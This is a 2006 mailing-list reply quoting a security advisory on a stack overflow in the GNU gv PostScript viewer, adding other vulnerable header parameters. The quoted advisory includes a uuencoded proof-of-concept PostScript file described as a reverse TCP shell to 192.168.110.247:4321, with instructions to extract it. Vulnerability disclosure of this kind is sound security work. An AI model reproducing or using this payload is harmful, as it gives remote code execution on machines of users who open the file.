Hi, Apparently that is not the only parameter to be vulnerable, any parameter that uses the ps_gettext function is vulnerable, this is a list: 1) DocumentMedia (confirmed vuln) 2) DocumentPaperSizes (confirmed vuln) 3) PageMedia (unconfirmed) 4) PaperSize (unconfirmed) On Thursday 09 November 2006 17:55, Renaud Lifchitz wrote: > GNU gv Stack Overflow Vulnerability > > > //----- Advisory > > > Program : GNU gv > Homepage : http://www.gnu.org/software/gv/ > Tested version : 3.6.2 > Found by : r.lifchitz at sysdream dot com > This advisory : r.lifchitz at sysdream dot com > Discovery date : 2006/11/06 > Vendor notified : 2006/11/09 > > > //----- Application description > > > gv is a comfortable viewer of PostScript and PDF files for the X > Window System. It uses the ghostscript PostScript interpreter > and is based on the classic X front-end for gs, ghostview, which > it has replaced now. > > > //----- Description of vulnerability > > > The 'gv' viewer is prone to a remote stack overflow > vulnerability. This issue exists because the application fails > to perform proper boundary checks before copying user-supplied > data into process buffers. A remote attacker may execute arbitrary > code in the context of a user running the application. As a result, > the attacker can gain unauthorized access to the vulnerable computer. > > This issue is present itself in the 'ps_gettext()' function residing > in the 'ps.c' file. > > Long comments in some specific headers (such as '%%DocumentMedia:') > of PS files are unconditionally copied into 'text', a 257 character > buffer on the stack. > > This issue is reported to affect gv 3.6.2, but earlier versions are > likely prone to this vulnerability as well. Applications using embedded > gv code may also be vulnerable. > > > //----- Proof Of Concept > > > * Linux IA32 Reverse TCP Shell on 192.168.110.247:4321 (uuencoded > exploit) : > > begin 644 hello-reverseshell.ps > M)2%04RU!9&]B92TS+C`*)254:71L93H@:&5L;&\N<',*)25&;W(Z(%)E;F%U > M9"!,:69C:&ET>B`M(%-Y<V1R96%M("T@:'1T<#HO+W=W=RYS>7-D<F5A;2YC > M;VTO"B4E0F]U;F1I;F=";W@Z(#(T(#(T(#4X."`W-C@*)25$;V-U;65N=$UE > M9&EA.B"0D)"0D)"0D#')@^GNV>[9="3T6X%S$](GKN*#Z_SB]./\_:&!3:R( > MM'\G`Q^G/;MB&&-BFUY7N8A/;DJ\T,B*PL;MA(&N3U*T=_^Q6\;M+U)UQLW] > M5,:*_47'C%O$_+%;QA[I'Z>NXD%!04%!04%!04%!04%!04%!04%!04%!04%! > M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! > M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! > M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! > M04%!04%!04'OO`0(04%!(#8Q,B`W.3(@,"`H*2`H*0HE)41O8W5M96YT1&%T > M83H@0VQE86XW0FET"B4E3W)I96YT871I;VXZ($QA;F1S8V%P90HE)5!A9V5S > M.B`Q"B4E4&%G94]R9&5R.B!!<V-E;F0*)24K(&5N8V]D:6YG($E33RTX.#4Y > 9+3%%;F-O9&EN9PHE)45N9$-O;6UE;G1S"@`` > ` > end > > > Use: > $ uudecode < this-advisory.txt > to extract the exploit. > > > //----- Solution > > > No known solution. You have to wait for a vendor upgrade and > be careful with unknown PS files. > > > //----- Impact > > > Successful exploitation leads to remote code execution. > > > //----- Credits > > > Renaud Lifchitz > r.lifchitz at sysdream dot com > http://www.sysdream.com/ > > > //----- Greetings > > > Thanks to Ali Rahbar -- Noam Rathaus CTO 1616 Anderson Rd. McLean, VA 22102 Tel: 703.286.7725 extension 105 Fax: 888.667.7740 noamr@xxxxxxxxxxxxxxxxxx http://www.beyondsecurity.com
